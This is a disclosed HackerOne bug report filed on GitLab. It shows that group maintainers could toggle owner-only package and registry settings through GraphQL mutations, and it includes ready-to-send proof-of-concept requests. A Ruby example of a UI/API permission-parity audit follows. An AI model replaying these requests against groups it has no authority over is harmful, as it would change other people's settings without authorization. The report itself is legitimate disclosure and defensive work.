
Group Maintainers can toggle package and registries settings

HackerOne report #1582356 by ashish_r_padelkar on 2022-05-26, assigned to GitLab Team:


Report

Summary

Hello,

Group Maintainers are able to toggle the package and registries settings using this missing permission check.

Steps to reproduce
  1. Log in as a Group owner and go to https://gitlab.com/groups/<GroupName>/-/settings/packages_and_registries. You should be able to toggle all the settings from here.

  2. Now log in as a maintainer in the group and navigate to the same URL https://gitlab.com/groups/<GroupName>/-/settings/packages_and_registries, but you won't be able to access it.

  3. Now run the GraphQL request below to toggle the setting for Maven package duplicates.

```http
POST /api/graphql HTTP/2
Host: gitlab.com
Cookie: 1
Content-Length: 501
X-Gitlab-Feature-Category: package_registry
X-Csrf-Token: 1
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Origin: https://gitlab.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://gitlab.com/groups/qqqq6/-/settings/packages_and_registries
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

[{"operationName":"updateNamespacePackageSettings","variables":{"input":{"namespacePath":"qqqq6","mavenDuplicatesAllowed":true}},"query":"mutation updateNamespacePackageSettings($input: UpdateNamespacePackageSettingsInput!) {\n  updateNamespacePackageSettings(input: $input) {\n    packageSettings {\n      mavenDuplicatesAllowed\n      mavenDuplicateExceptionRegex\n      genericDuplicatesAllowed\n      genericDuplicateExceptionRegex\n      __typename\n    }\n    errors\n    __typename\n  }\n}\n"}]
```

Change namespacePath in the above query.

  4. Similarly, the GraphQL request below will toggle the Dependency Proxy.

```json
[{"operationName":"updateDependencyProxySettings","variables":{"input":{"groupPath":"qqqq6","enabled":true}},"query":"mutation updateDependencyProxySettings($input: UpdateDependencyProxySettingsInput!) {\n  updateDependencyProxySettings(input: $input) {\n    dependencyProxySetting {\n      enabled\n      __typename\n    }\n    errors\n    __typename\n  }\n}\n"}]
```

Change groupPath in the above query.

  5. This will toggle "Clear the Dependency Proxy cache automatically".

```json
[{"operationName":"updateDependencyProxyImageTtlGroupPolicy","variables":{"input":{"groupPath":"qqqq6","enabled":true,"ttl":90}},"query":"mutation updateDependencyProxyImageTtlGroupPolicy($input: UpdateDependencyProxyImageTtlGroupPolicyInput!) {\n  updateDependencyProxyImageTtlGroupPolicy(input: $input) {\n    dependencyProxyImageTtlPolicy {\n      enabled\n      ttl\n      __typename\n    }\n    errors\n    __typename\n  }\n}\n"}]
```

Change groupPath in the above query.

What is the current bug behavior?

Group Maintainers are able to toggle package and registries settings

What is the expected correct behavior?

Only group owners should be able to do so!

Output of checks

This bug happens on GitLab.com

Regards,
Ashish

Impact

Group Maintainers can toggle package and registries settings

🤓 Proposed solution

Update the documentation to acknowledge the discrepancy; see #364441 (comment 1018411511).

A follow-up issue to raise the permissions of the group-level APIs to owner #370471 (closed)
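The report and the follow-up issue describe a class of bug rather than a single mutation: a settings page is gated to owners in the UI, while the GraphQL mutations behind it accept maintainers, so the UI check alone gives no protection. The Ruby below is an added example, not GitLab's code and not its authorization framework. It models a role ladder, the UI page's minimum role, and the three mutation names quoted in the report, with hypothetical "before" and "after" policy tables, and it includes a parity audit that flags every role that can reach a mutation through the API but is denied the page that exposes it. All role names, policy tables and settings values are constructed for illustration.

```ruby
# Added example (not GitLab code): models the UI-vs-API authorization gap the
# report describes. Roles, policies and settings are hypothetical.

ROLES = %i[guest reporter developer maintainer owner].freeze

# Numeric rank lets us express "at least <role>" style checks.
def role_rank(role)
  rank = ROLES.index(role)
  raise ArgumentError, "unknown role #{role.inspect}" if rank.nil?
  rank
end

# Minimum role required to open the settings page in the UI (constructed).
UI_PAGE_MIN_ROLE = { packages_and_registries: :owner }.freeze

# The mutation names quoted in the report; the minimum roles are constructed
# to mirror the behaviour before and after raising the APIs to owner.
MUTATIONS = %i[
  updateNamespacePackageSettings
  updateDependencyProxySettings
  updateDependencyProxyImageTtlGroupPolicy
].freeze

API_MIN_ROLE_BEFORE = MUTATIONS.to_h { |m| [m, :maintainer] }.freeze
API_MIN_ROLE_AFTER  = MUTATIONS.to_h { |m| [m, :owner] }.freeze

# Does the actor's role meet the required minimum?
def allowed?(actor_role, min_role)
  role_rank(actor_role) >= role_rank(min_role)
end

# Simulated mutation resolver: the authorization check runs before any state
# change, and a denial is reported in the errors array (GraphQL style) while
# the settings are returned unchanged.
def run_mutation(policy, mutation, actor_role, settings, input)
  min = policy.fetch(mutation)
  unless allowed?(actor_role, min)
    return { settings: settings,
             errors: ["#{mutation}: requires #{min}, actor is #{actor_role}"] }
  end
  { settings: settings.merge(input), errors: [] }
end

# Parity audit: for each role, list mutations the API permits even though the
# UI page that exposes them is denied. Each entry is a gap of the kind this
# report exercises; an empty result means UI and API agree.
def ui_api_parity_gaps(ui_min_role, api_policy)
  gaps = []
  ROLES.each do |role|
    ui_ok = allowed?(role, ui_min_role)
    api_policy.each do |mutation, min|
      gaps << { role: role, mutation: mutation } if allowed?(role, min) && !ui_ok
    end
  end
  gaps
end

if __FILE__ == $PROGRAM_NAME
  settings = { mavenDuplicatesAllowed: false }
  input    = { mavenDuplicatesAllowed: true }
  page_min = UI_PAGE_MIN_ROLE[:packages_and_registries]

  puts "maintainer, before fix: " \
       "#{run_mutation(API_MIN_ROLE_BEFORE, :updateNamespacePackageSettings, :maintainer, settings, input)}"
  puts "maintainer, after fix:  " \
       "#{run_mutation(API_MIN_ROLE_AFTER, :updateNamespacePackageSettings, :maintainer, settings, input)}"
  puts "parity gaps before fix: #{ui_api_parity_gaps(page_min, API_MIN_ROLE_BEFORE).size}"
  puts "parity gaps after fix:  #{ui_api_parity_gaps(page_min, API_MIN_ROLE_AFTER).size}"
end
```

Running the file shows the maintainer's mutation succeeding under the "before" table and being refused under the "after" table, and the parity audit dropping from three gaps (one per mutation, all for the maintainer role) to zero. The design point is that the audit reads the same policy table the resolver consults; if the UI page and the mutations share one source of minimum roles, the two cannot drift apart the way the report describes.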

Edited by Michelle Torres